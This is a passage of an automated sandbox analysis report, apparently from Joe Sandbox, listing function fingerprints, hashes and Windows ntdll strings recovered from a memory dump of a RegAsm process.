                                                  • minkernel\ntdll\ldrredirect.c, xrefs: 028D4899
                                                  • LdrpCheckRedirection, xrefs: 028D488F
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                  • API String ID: 0-3154609507
                                                  • Opcode ID: 2de11242ec22e88e436533627ee563e846774a815c276353d5ca057d7ef0dc74
                                                  • Instruction ID: 55e35d6aab05951ee17ea44e69e07bce4ec9ea8500d951a975d27f7ebe1c3320
                                                  • Opcode Fuzzy Hash: 2de11242ec22e88e436533627ee563e846774a815c276353d5ca057d7ef0dc74
                                                  • Instruction Fuzzy Hash: BB41E13EA843949FCB21CE69D840E26BBE5AF49B94F050569EC8DE7311D730D818CB81
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                  • API String ID: 0-2558761708
                                                  • Opcode ID: 0146dcb0e8b19fa0334505c1db14ceaf2effb9eff019d8972020417dfe7f6d2c
                                                  • Instruction ID: dcad942d77675031a86c3cf2b359f6bbe7cf34e354f33468e24b241b4021c0fc
                                                  • Opcode Fuzzy Hash: 0146dcb0e8b19fa0334505c1db14ceaf2effb9eff019d8972020417dfe7f6d2c
                                                  • Instruction Fuzzy Hash: 9711FD7C35410A9FEB1AC628C444BB6B3A5EF40B1AF58C12DE40ADB390EB38D880CB45
                                                  Strings
                                                  • minkernel\ntdll\ldrinit.c, xrefs: 028D2104
                                                  • LdrpInitializationFailure, xrefs: 028D20FA
                                                  • Process initialization failed with status 0x%08lx, xrefs: 028D20F3
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                  • API String ID: 0-2986994758
                                                  • Opcode ID: 4de0314a4987378677505f6a7a2a985d9c0ec76a131d7dafdc94e8f757bc3415
                                                  • Instruction ID: 8f7a2076cdd18562ce7426c1c89a97088aaa504e0dd366a7d2eda2d5195eb39c
                                                  • Opcode Fuzzy Hash: 4de0314a4987378677505f6a7a2a985d9c0ec76a131d7dafdc94e8f757bc3415
                                                  • Instruction Fuzzy Hash: C1F0283CA80308ABEB14D65CDC02FA537A8EB40B04F100455FA44F7286D6B0A914CA81
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID: ___swprintf_l
                                                  • String ID: #%u
                                                  • API String ID: 48624451-232158463
                                                  • Opcode ID: 78e7bfba176cff5922c106cd4709b302b1d2142330fa089bbdafc9900a857096
                                                  • Instruction ID: 616d8a98a519d09303eefa612d74196087adf570ae2670bc483616292510c5fa
                                                  • Opcode Fuzzy Hash: 78e7bfba176cff5922c106cd4709b302b1d2142330fa089bbdafc9900a857096
                                                  • Instruction Fuzzy Hash: 4F716C79A001099FDB11DFA8C995BAEB7F9FF08708F144069E905E7251EB38ED01CB61
                                                  Strings
                                                  • LdrResSearchResource Exit, xrefs: 0285AA25
                                                  • LdrResSearchResource Enter, xrefs: 0285AA13
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                  • API String ID: 0-4066393604
                                                  • Opcode ID: ab358eaeec7190811b9dbb9ad33de1e3484bc9928b8a769a858269a01d9ef052
                                                  • Instruction ID: dce2776660e9b89071246cb58415b45458c53c083f239a96ee7858a661ac940b
                                                  • Opcode Fuzzy Hash: ab358eaeec7190811b9dbb9ad33de1e3484bc9928b8a769a858269a01d9ef052
                                                  • Instruction Fuzzy Hash: 92E1807DE00629ABEF268E99C984BEEB7BAAF04314F10426AFD05E7350D7349941CB51
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: `$`
                                                  • API String ID: 0-197956300
                                                  • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                  • Instruction ID: d0f818a87ac431432db533650b595b6da320c28b74a5d653ead813c98358decc
                                                  • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                  • Instruction Fuzzy Hash: DCC1D3312053499FDB25CF2AC845B6BBBEABFC4358F044A2DF595CA290D774D905CB41
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID: Legacy$UEFI
                                                  • API String ID: 2994545307-634100481
                                                  • Opcode ID: 84cfe550238784b6bb62354d6cdaf9f565c515ce3667171a03f1ecb7cd2de4cc
                                                  • Instruction ID: 149615faff29c98723a31f3f534af5646dc789661ab92619617957d94b810bbf
                                                  • Opcode Fuzzy Hash: 84cfe550238784b6bb62354d6cdaf9f565c515ce3667171a03f1ecb7cd2de4cc
                                                  • Instruction Fuzzy Hash: EA614C79E043199FDB24DFA8C840BAEBBB9FB48704F24406DE649EB251DB31E940CB50
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @$MUI
                                                  • API String ID: 0-17815947
                                                  • Opcode ID: 5d045eb9dde268f373b9b9eb743d7bab818ee5a90f4a4d39ee9997fe4ab93500
                                                  • Instruction ID: 9011b63030e8bce773d7ff8ace19f2f1f93617a618727e7b8756b9556653c59b
                                                  • Opcode Fuzzy Hash: 5d045eb9dde268f373b9b9eb743d7bab818ee5a90f4a4d39ee9997fe4ab93500
                                                  • Instruction Fuzzy Hash: DE513C79D0121DAEDF11DFA9CC80AEFBBB9EB48758F14052AEA15F7240E7309905CB60
                                                  Strings
                                                  • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0285063D
                                                  • kLsE, xrefs: 02850540
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                  • API String ID: 0-2547482624
                                                  • Opcode ID: ccab8eb4e76f44b5143923737eded28a521569eab6808a305754bddd9cb85874
                                                  • Instruction ID: bfa993340a02095efadba1a3dc06accd12a292d093dfb0996b4b76c26e5b2f19
                                                  • Opcode Fuzzy Hash: ccab8eb4e76f44b5143923737eded28a521569eab6808a305754bddd9cb85874
                                                  • Instruction Fuzzy Hash: DC51BBBD5047668FC724EF68C4406A7B7E5AF88304F00883EE9AAC7241E734E545CF92
                                                  Strings
                                                  • RtlpResUltimateFallbackInfo Exit, xrefs: 0285A309
                                                  • RtlpResUltimateFallbackInfo Enter, xrefs: 0285A2FB
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                  • API String ID: 0-2876891731
                                                  • Opcode ID: 88e12cba05c7633aaf347580e0eac9d145af9179d87fcf35d344af864b59809b
                                                  • Instruction ID: 888bd6990b17407f6378ffd8b8ad0fa8d35089c5701799703c6e31e0e41792e5
                                                  • Opcode Fuzzy Hash: 88e12cba05c7633aaf347580e0eac9d145af9179d87fcf35d344af864b59809b
                                                  • Instruction Fuzzy Hash: 9541D03DA00669DBCB1ACF69C884BAAB7B4FF85708F1841A9ED08DB355E735D940CB41
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID: Cleanup Group$Threadpool!
                                                  • API String ID: 2994545307-4008356553
                                                  • Opcode ID: f66fb3b43b6569f826e3d7f520246b4c6025db5e139b25a364d12e463346c16f
                                                  • Instruction ID: 24e5cee4cec0d4d2cf58fe7a84cf83a072c9611e5d534ca15b9bc3161c8e8af1
                                                  • Opcode Fuzzy Hash: f66fb3b43b6569f826e3d7f520246b4c6025db5e139b25a364d12e463346c16f
                                                  • Instruction Fuzzy Hash: E901F4BE695744AFE311EF18CD45F2677E8E744B1AF00893AA548C72D5E338E804CB4A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: MUI
                                                  • API String ID: 0-1339004836
                                                  • Opcode ID: 8c4ed8a4df9e170b38ade937d208a25591ff46fdd69d01fd4053406cb8ee2e83
                                                  • Instruction ID: 46f8b93f245ca55a6716ee8470bbfafb50a7c8f6509d7b60ea69f698e21adfb3
                                                  • Opcode Fuzzy Hash: 8c4ed8a4df9e170b38ade937d208a25591ff46fdd69d01fd4053406cb8ee2e83
                                                  • Instruction Fuzzy Hash: AB823B7DE003299BDB24CFA9C880BADB7B5BF48314F14816AEC59EB250D774A981CF51
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID: 0-3916222277
                                                  • Opcode ID: c383c6b25a1e030e874f44d7116877da3ee77becaac8379f375c208676bac7cb
                                                  • Instruction ID: 52447b43acec23d93a49f1bb05e7942c4c6b710885d05400ba1ae1c60b17a259
                                                  • Opcode Fuzzy Hash: c383c6b25a1e030e874f44d7116877da3ee77becaac8379f375c208676bac7cb
                                                  • Instruction Fuzzy Hash: 84918079900229AFEB21DB98DC85FAEB7B9EF04B54F100065F604EB191E774E904CFA1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID: 0-3916222277
                                                  • Opcode ID: bc372c27ec7ed0c1a6ac53bce6c9ea6fc0d869eec8782dd5c4c486b9c692a83a
                                                  • Instruction ID: 7b788a58446977f8a83d3250518a9335afe29886c7012b61a7696a9507b24a9d
                                                  • Opcode Fuzzy Hash: bc372c27ec7ed0c1a6ac53bce6c9ea6fc0d869eec8782dd5c4c486b9c692a83a
                                                  • Instruction Fuzzy Hash: 8191B03E901648BBDB22AFA9DC48FAFBBBAEF45744F140025F605E7260E7349941CB51
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: GlobalTags
                                                  • API String ID: 0-1106856819
                                                  • Opcode ID: 14e4bb0b815b9cbb2178f9de86e0172443b0f764a9bbfba2cedb445c3974153d
                                                  • Instruction ID: 40752ea1582ee4404dd61e135f81d67cde8172895c4f38af40190992983efc4e
                                                  • Opcode Fuzzy Hash: 14e4bb0b815b9cbb2178f9de86e0172443b0f764a9bbfba2cedb445c3974153d
                                                  • Instruction Fuzzy Hash: 3E714D7DE0422A9BDB18DF98C5906ADBBB6BF88714F24853EE409E7240E734D901CF50
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: EXT-
                                                  • API String ID: 0-1948896318
                                                  • Opcode ID: a890eedf632691cefb2c11c0aa525a5f7685256fcc1a458323e09b431a5b5155
                                                  • Instruction ID: 064ac260fe4c895f3ae486cdb0080ecab5cc757c70d8f37dff963fa52b889fd6
                                                  • Opcode Fuzzy Hash: a890eedf632691cefb2c11c0aa525a5f7685256fcc1a458323e09b431a5b5155
                                                  • Instruction Fuzzy Hash: 21419F7E5183119BD710DA68C888F7BB7E9AF88708F44092DFA89D7140EB74D904CB93
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: BinaryHash
                                                  • API String ID: 0-2202222882
                                                  • Opcode ID: b344dcd48b007b28903185701576c0bf863342a4dad7b61f6061d4fa0883b459
                                                  • Instruction ID: 685b5ba257ba5402b6c2b41cff6eaefc3216b5c96307e69066926c255bafbc59
                                                  • Opcode Fuzzy Hash: b344dcd48b007b28903185701576c0bf863342a4dad7b61f6061d4fa0883b459
                                                  • Instruction Fuzzy Hash: 8A4143B9D0112CAADF219A54CC84FDEB77DEB44718F1045EAAA08E7140DB709E498FA5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: #
                                                  • API String ID: 0-1885708031
                                                  • Opcode ID: deccba88c6b16e7d8b018c1d8cef726dec84148e25ef213e43bd4d83bf31b8e0
                                                  • Instruction ID: a2830bbe2d72fa60cf9c540ada8fb4c89c51feaaba8c67075fae3f2b04fba986
                                                  • Opcode Fuzzy Hash: deccba88c6b16e7d8b018c1d8cef726dec84148e25ef213e43bd4d83bf31b8e0
                                                  • Instruction Fuzzy Hash: 0A314A3DA007689BEF21CB68C850BAE77ADDF66708F144068E946EB282E775D805CB50
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: BinaryName
                                                  • API String ID: 0-215506332
                                                  • Opcode ID: 2527c3c80e1753737938277850e7ebf76fcd9797f7ff24be4f6f97f5fdaaa118
                                                  • Instruction ID: 3b2d57e3cd3c2f303948f258829e49e765e616765602068e975906f7c145d7c8
                                                  • Opcode Fuzzy Hash: 2527c3c80e1753737938277850e7ebf76fcd9797f7ff24be4f6f97f5fdaaa118
                                                  • Instruction Fuzzy Hash: A931E17E900519AFEB15DA98C855E7FB7B5EB80724F21416EE909E7250D730EE04CBE0
                                                  Strings
                                                  • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 028D895E
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                  • API String ID: 0-702105204
                                                  • Opcode ID: ed10fa7693efc72fac8a1128d6600216b536c5b026fc0b44dbacbc82c1b96b2a
                                                  • Instruction ID: 15239edd0e25ece77098ad04f08888560ca92955f6c5ca00adffd9ce4554e5a4
                                                  • Opcode Fuzzy Hash: ed10fa7693efc72fac8a1128d6600216b536c5b026fc0b44dbacbc82c1b96b2a
                                                  • Instruction Fuzzy Hash: 78012B3D200314BBE7206F95CC88E6A7BA6EF8536AF050419E986D6551CF20AC4ACB93
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e871d16e1986f2173dddafbc20480c66ae65f2fdb6939bb19d4385c40d126d01
                                                  • Instruction ID: 41a312c4f33c38d1d96d7d8fc4b5fc09044df653e9a54eb06d3662ac64a277ca
                                                  • Opcode Fuzzy Hash: e871d16e1986f2173dddafbc20480c66ae65f2fdb6939bb19d4385c40d126d01
                                                  • Instruction Fuzzy Hash: A242CF7E6083418BD7A5CF68C890B6BB7E6AF88304F48492DFE8AC7254D770D845CB52
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 640232a18f4ca215426dd5aeb1d9dcc9a543e1b3eaf4bb0e879bb45ef7dcafde
                                                  • Instruction ID: 0c4fd202eb5ae1ea9380ac80a34860b2dd4f41c719c6d1fbfecd51eb8341cb4a
                                                  • Opcode Fuzzy Hash: 640232a18f4ca215426dd5aeb1d9dcc9a543e1b3eaf4bb0e879bb45ef7dcafde
                                                  • Instruction Fuzzy Hash: 52424A79A002198FDF24CF69C881BADB7F6BF49304F188099E94DEB252D7349981CF60
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 23584799737ef9c17566d124a9e610fd564700f81f31c40d0d979f56585c8a73
                                                  • Instruction ID: 994774b22da547be5c12c93a810ecf3737a016b1d9c49a429349d6332551efc0
                                                  • Opcode Fuzzy Hash: 23584799737ef9c17566d124a9e610fd564700f81f31c40d0d979f56585c8a73
                                                  • Instruction Fuzzy Hash: B732AD7CA006698BDB26CF69C844BBABBFABF85308F14411DD44ADB784E735A845CF50
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 24078ab45a35e6bd4e5add87299029ba20faaae772d2e2761601a050e1bdb316
                                                  • Instruction ID: feb3b7b2b716d1ef7c140f39543bc4d3803e3964c6e8a12e4693dceb2216f9eb
                                                  • Opcode Fuzzy Hash: 24078ab45a35e6bd4e5add87299029ba20faaae772d2e2761601a050e1bdb316
                                                  • Instruction Fuzzy Hash: 2522C07C2046558FDBA8CF29C090772B7F1AF44328F188459DA9ECF286E735E492CB60
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: baa0c2b72e6868fafc5768d13a723f59ee47177f12fe85789f62cc499a4ede1f
                                                  • Instruction ID: 27f4d6ea47af1654b72971607ea5fa6d5b19f67d3da1f7dc8edcf99a5216d6aa
                                                  • Opcode Fuzzy Hash: baa0c2b72e6868fafc5768d13a723f59ee47177f12fe85789f62cc499a4ede1f
                                                  • Instruction Fuzzy Hash: 5632897DA01628CFCB25CF68C490BAAB7F6FF48304F548569E859EB391E734A841CB51
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                  • Instruction ID: d947a1d379c331325a5cbd3d2474ab83158658f930684f622be492883ed23de6
                                                  • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                  • Instruction Fuzzy Hash: CEF16E7DE002199BDF15CF99C980BAEBBB5AF48718F048169E949EB350E774E841CB60
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9fb7411395c19f682729821922c3f02e3526ee9c11af31f2f472d0894100ebf6
                                                  • Instruction ID: 2fce27b6ca480d93f37266ee314a7e82f96429b2a1ad440bdb74c4ac2f6ffa8d
                                                  • Opcode Fuzzy Hash: 9fb7411395c19f682729821922c3f02e3526ee9c11af31f2f472d0894100ebf6
                                                  • Instruction Fuzzy Hash: A7D1CF7DE006099FDF15CF68C841BBEB7B2AF8A308F188169D85AE7251D735E905CB60
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2dc557d6078b38c9293e1e65ee3a2b60eeeff7abdeddd449d50054b64a47927d
                                                  • Instruction ID: c1bf573b45d5e3bbaf47844e90800c79920fd18f74883ffa4811a8a168e8a3ff
                                                  • Opcode Fuzzy Hash: 2dc557d6078b38c9293e1e65ee3a2b60eeeff7abdeddd449d50054b64a47927d
                                                  • Instruction Fuzzy Hash: DDE17E79508361CFC714CF28C094A6ABBE5FF89318F458A6DE899C7351EB31E905CB92
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a9bbd8010d05c9b75a8f5f54cd73fb54c0cf84e56987faaceda80616fd794e95
                                                  • Instruction ID: 144e3644b2ce68937901b1bc948273c4c00309320fd1b85533e3f6e0357d657f
                                                  • Opcode Fuzzy Hash: a9bbd8010d05c9b75a8f5f54cd73fb54c0cf84e56987faaceda80616fd794e95
                                                  • Instruction Fuzzy Hash: F4D1A07DA0060A9BDB14DF68CCA0EBA73A6BF5430CF058629E916DB281EF34D945CB51
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                  • Instruction ID: 808cb56d08fc841d59ca0cad4ed48856e2f968c07c6cdfd4c8c3dff4366f27cd
                                                  • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                  • Instruction Fuzzy Hash: A5B1817CA00609AFDF24DB95C940BABB7BABF84318F148459A906D7790DB74ED0ACB50
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                  • Instruction ID: 6e8e95a5080680b2a83ef0183af0c58423a4b5cabceb8c02b3a4ecd9dd8b4b8e
                                                  • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                  • Instruction Fuzzy Hash: 82B1273D600649AFDB26DBA8C858BBEB7F6BF84304F140199E546D7382DB34E941CB54
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 699c475125ad5e5d4483043c6c5a7b2f369994984980b6eed49452c29023c19d
                                                  • Instruction ID: 6325004aaed73705cf236af22e3e46605db378c7be3395876f1e5a04ab45a6a8
                                                  • Opcode Fuzzy Hash: 699c475125ad5e5d4483043c6c5a7b2f369994984980b6eed49452c29023c19d
                                                  • Instruction Fuzzy Hash: 74C138785083408FD764CF19C494BAAB7E5BF88308F44496EE989CB390DB74E949CF92
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e338a6d522fb68dba633c432f7b4c14cfa834c162c7c7f71a3fd002088e86468
                                                  • Instruction ID: d989703bb99d899d12a665569fa06b3a0f107b8d148ffc87429691d9d5b9eec7
                                                  • Opcode Fuzzy Hash: e338a6d522fb68dba633c432f7b4c14cfa834c162c7c7f71a3fd002088e86468
                                                  • Instruction Fuzzy Hash: 0AB1507CA012598BDB24DF68C890BADB3B6FF44704F0585EAD50AE7291EB349D85CF21
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
